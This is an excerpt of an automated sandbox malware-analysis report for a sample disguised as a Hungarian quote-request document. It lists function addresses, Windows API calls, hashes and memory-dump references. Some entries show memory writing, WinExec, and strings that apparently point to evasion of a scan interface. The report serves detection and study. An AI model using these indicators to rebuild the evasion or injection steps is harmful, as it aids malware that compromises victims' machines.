                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: e6bfd17507eb38dbe091d6b4339faf05302206a60a1145b01efe3e9c5a911bb5
                                                                                                                                                  • Instruction ID: 92b7c54618394b240e47deef2d63f17d9f6e13caadc6406d9c7b81b32d9e3e8e
                                                                                                                                                  • Opcode Fuzzy Hash: e6bfd17507eb38dbe091d6b4339faf05302206a60a1145b01efe3e9c5a911bb5
                                                                                                                                                  • Instruction Fuzzy Hash: DA51E2716013408FD725CF6CC9A4766BBE4AF8A314F1985AED84CCB296EB70C445CBD1
                                                                                                                                                  Function 029BE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029BE5F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                                                  • Opcode ID: 8c126fdf86f860fb98aa95d4612a2b9bfb42779a9a74d20f63adf344b114319e
                                                                                                                                                  • Instruction ID: 2e1ec77a523fd8a1940a189f4a82efeb20b12aeee59e5417e068bbefb375de7d
                                                                                                                                                  • Opcode Fuzzy Hash: 8c126fdf86f860fb98aa95d4612a2b9bfb42779a9a74d20f63adf344b114319e
                                                                                                                                                  • Instruction Fuzzy Hash: D4410035B1024C9FEB12EBA8D951ADEB3FAFFC8700F605435E041A7291DAB4AD118F95
                                                                                                                                                  Function 029B85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 029B8624
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                  • Opcode ID: 751f08323a179d5e2a381d0ff18f001477dd6f9b7e0c39f647a43c88d76f08d9
                                                                                                                                                  • Instruction ID: fb5a4620855050e3d580b77383d51af325bea5d30d7ff097c77373856c8eaefd
                                                                                                                                                  • Opcode Fuzzy Hash: 751f08323a179d5e2a381d0ff18f001477dd6f9b7e0c39f647a43c88d76f08d9
                                                                                                                                                  • Instruction Fuzzy Hash: 7A016D74684304EFEB11EBB8DE61BAAB7EDFB88B00F514460F900D6640DA70AE118A64
                                                                                                                                                  Function 029B85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 029B8624
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                  • Opcode ID: 118ce5eef406e1c20bccc0046a088c73ab420acf7c0e887d295f724322e07f4b
                                                                                                                                                  • Instruction ID: 760448655d459276f16a651761cb31b50a79f5c34fb4950e0d297e05fbecfc75
                                                                                                                                                  • Opcode Fuzzy Hash: 118ce5eef406e1c20bccc0046a088c73ab420acf7c0e887d295f724322e07f4b
                                                                                                                                                  • Instruction Fuzzy Hash: B9F06D74684304EFEB11EBA8DE61B9AB7EDFB88B00F514460F900D6640DA70AE118A64
                                                                                                                                                  Function 029B5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029B5D74,?,?,029B3900,00000001), ref: 029B5C88
                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029B5D74,?,?,029B3900,00000001), ref: 029B5CB6
                                                                                                                                                    • Part of subcall function 029A7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029B3900,029B5CF6,00000000,029B5D74,?,?,029B3900), ref: 029A7DAA
                                                                                                                                                    • Part of subcall function 029A7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029B3900,029B5D11,00000000,029B5D74,?,?,029B3900,00000001), ref: 029A7FB7
                                                                                                                                                  • GetLastError.KERNEL32(00000000,029B5D74,?,?,029B3900,00000001), ref: 029B5D1B
                                                                                                                                                    • Part of subcall function 029AA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,029AC3D9,00000000,029AC433), ref: 029AA797
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 503785936-0
                                                                                                                                                  • Opcode ID: c4bb1b0b6f019a6859be5f5bec935dce1c3404f0ace1cf6bab24180af3754db9
                                                                                                                                                  • Instruction ID: 86b250750ea91f79dd3b91948f99fe9e9aa511401bdd58931920cb4dd3da60cc
                                                                                                                                                  • Opcode Fuzzy Hash: c4bb1b0b6f019a6859be5f5bec935dce1c3404f0ace1cf6bab24180af3754db9
                                                                                                                                                  • Instruction Fuzzy Hash: 6B31A070A003089FDB01EFA8C9917EEBBF6AF88700F918168D504AB390D7755E048FA5
                                                                                                                                                  Function 029AE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                  • Opcode ID: 55e1cd125640de84e3ccdf8b6b4db3bb9365db596515c624112adc1bf6b9ffc1
                                                                                                                                                  • Instruction ID: 00314fc112730e2a03ad24545db9d0a672059e0e3d571f1c9475a61e2dd7ade2
                                                                                                                                                  • Opcode Fuzzy Hash: 55e1cd125640de84e3ccdf8b6b4db3bb9365db596515c624112adc1bf6b9ffc1
                                                                                                                                                  • Instruction Fuzzy Hash: 31F06D24B09310C7AB25BB398DF46AD379ADF80344B101C36F486AB215DF65CC49CBE2
                                                                                                                                                  Function 029A4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 029A4D5B
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 029A4D6D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                  • Instruction ID: 6294bc7210721669daaf5687ad2e23af61b029870c7714ed5dc40e962e5182bb
                                                                                                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                  • Instruction Fuzzy Hash: 07E0ECBC2053056EEB146F219960AB6622EAFC1750F249499A814CA154D778D440ADB8
                                                                                                                                                  Function 029B70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 029B73DA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeString
                                                                                                                                                  • String ID: H
                                                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                                                  • Opcode ID: 2e7716513ce00d596eb56bdf9056814f112868d272e128604906b80a210347a2
                                                                                                                                                  • Instruction ID: caabf6fe6edce7795e01762ecb2a76349cff24f1c2bb0fa136be7029b7af3cce
                                                                                                                                                  • Opcode Fuzzy Hash: 2e7716513ce00d596eb56bdf9056814f112868d272e128604906b80a210347a2
                                                                                                                                                  • Instruction Fuzzy Hash: 37B1D075A016089FDB16CF98E580AEDFBF6FF89314F258669E805AB360D730A845CF50
                                                                                                                                                  Function 029AE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 029AE781
                                                                                                                                                    • Part of subcall function 029AE364: VariantClear.OLEAUT32(?), ref: 029AE373
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                                  • Opcode ID: b047b37d413f93bfe8d3de241d09eb41bfc2229e6d6e87df045af3473255ab7d
                                                                                                                                                  • Instruction ID: d42d52b32ae65acd1b901829469dc741f996b04f71c7e759c1f2cd06f727c535
                                                                                                                                                  • Opcode Fuzzy Hash: b047b37d413f93bfe8d3de241d09eb41bfc2229e6d6e87df045af3473255ab7d
                                                                                                                                                  • Instruction Fuzzy Hash: A6118E20B0031087CB35AF29C8E4A6677DAAFC5750B019876E9CA9B215DB30CC41CAE2
                                                                                                                                                  Function 029AE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                                  • Opcode ID: c7d921218623021e656e47650810d7b8730648207d4712b9062f9e0c4acda57b
                                                                                                                                                  • Instruction ID: 5b344d5117bcc8f301d5a758c34b2cb3cb714291dacf8fdb8b7080b916445d4e
                                                                                                                                                  • Opcode Fuzzy Hash: c7d921218623021e656e47650810d7b8730648207d4712b9062f9e0c4acda57b
                                                                                                                                                  • Instruction Fuzzy Hash: 97315E71A04308ABDB10DFA8C8A4AAA7BFDEB4C304F544475F989D3240D734DA50CBE5
                                                                                                                                                  Function 029B89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                    • Part of subcall function 029B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029B83C2), ref: 029B83A4
                                                                                                                                                  • FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1478290883-0
                                                                                                                                                  • Opcode ID: 4f163c48f64c64be77ad15fd1228e41c239cbd59976c8b08ea78c2d9d55bd866
                                                                                                                                                  • Instruction ID: 796ef7d457fe79b50808de67ed8260032858553fbf331f5ba347e05dd6179c12
                                                                                                                                                  • Opcode Fuzzy Hash: 4f163c48f64c64be77ad15fd1228e41c239cbd59976c8b08ea78c2d9d55bd866
                                                                                                                                                  • Instruction Fuzzy Hash: 0D214574A80300BEEB51FBB8DE16B9DB79DBFC5B00F5014A0F504E7280DA749A118E58
                                                                                                                                                  Function 029B6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,029B6DB9,?,?,?,00000000), ref: 029B6D99
                                                                                                                                                    • Part of subcall function 029A4C60: SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeFromProgString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4225568880-0
                                                                                                                                                  • Opcode ID: 856ca387039bef35d7ca32b427a3efb8962bafb0638a72fa9f8f0fcff1ebfcc9
                                                                                                                                                  • Instruction ID: 83fd8cbb1354a439959eb8a4328efc253e0f701d2f8f3bdc28172bd2f439d5ef
                                                                                                                                                  • Opcode Fuzzy Hash: 856ca387039bef35d7ca32b427a3efb8962bafb0638a72fa9f8f0fcff1ebfcc9
                                                                                                                                                  • Instruction Fuzzy Hash: 3CE0E5352043087BE312EB62DD61D8E77EDDFCA700F5104B1E50093540DA717D0088A0
                                                                                                                                                  Function 029A5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029A5886
                                                                                                                                                    • Part of subcall function 029A5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029A0000,029CE790), ref: 029A5AE8
                                                                                                                                                    • Part of subcall function 029A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B06
                                                                                                                                                    • Part of subcall function 029A5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B24
                                                                                                                                                    • Part of subcall function 029A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029A5B42
                                                                                                                                                    • Part of subcall function 029A5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029A5B8B
                                                                                                                                                    • Part of subcall function 029A5ACC: RegQueryValueExA.ADVAPI32(?,029A5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001), ref: 029A5BA9
                                                                                                                                                    • Part of subcall function 029A5ACC: RegCloseKey.ADVAPI32(?,029A5BD8,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029A5BCB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
